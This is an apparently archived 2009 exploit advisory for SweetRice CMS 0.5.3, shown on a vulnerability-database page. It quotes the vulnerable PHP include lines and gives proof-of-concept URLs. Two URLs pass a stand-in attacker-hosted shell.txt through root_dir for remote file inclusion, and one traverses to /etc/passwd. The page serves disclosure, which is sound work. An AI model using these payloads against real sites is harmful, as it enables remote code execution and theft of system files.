Lucene search
K

SweetRice 0.5.3 Remote / Local File Inclusion

🗓️ 30 Nov 2009 00:00:00Reported by cr4wl3rType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 16 Views

SweetRice 0.5.3 Remote / Local File Inclusion vulnerability in multiple file

Code
` [ Discovered by cr4wl3r \ cr4wl3r[4t]linuxmail[dot]org ]  
  
########################################################################  
#SweetRice <= 0.5.3 Multiple Remote Vulnerability  
#Download Script : http://www.basic-cms.org/  
#Dork : die("lamers attempt"); :P  
########################################################################  
#  
#RFI Vuln : ./sweetrice/_plugin/subscriber/inc/post.php (line 2)  
# <?php  
# include_once($root_dir."_plugin/fckeditor/fckeditor.php") ;  
# ?>  
#PoC : http://[target]/[path]/_plugin/subscriber/inc/post.php?root_dir=http://[attacker]/shell.txt???  
#  
#RFI Vuln : ./sweetrice/as/lib/news_modify.php (line 2)  
# <?php  
# include_once($root_dir."_plugin/fckeditor/fckeditor.php") ;  
# ?>  
#PoC : http://[target]/[path]/as/lib/news_modify.php?root_dir=http://[attacker]/shell.txt???  
#  
########################################################################  
#LFI Vuln : ./sweetrice/as/lib/plugins.php   
# <?php  
# if(file_exists('../_plugin/'.$plugin.'/plugin_config.php'))  
# {  
# include('../_plugin/'.$plugin.'/plugin_config.php');  
# ?>  
#PoC : http://[target]/[path]/as/lib/plugins.php?plugin=../../../../../../etc/passwd  
#  
########################################################################  
########################################################################  
####################[90r0nt4l0 und3r9r0nd c0mmun1ty]####################  
########################################################################  
########################################################################  
  
[ Gorontalo / 2009 ]   
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation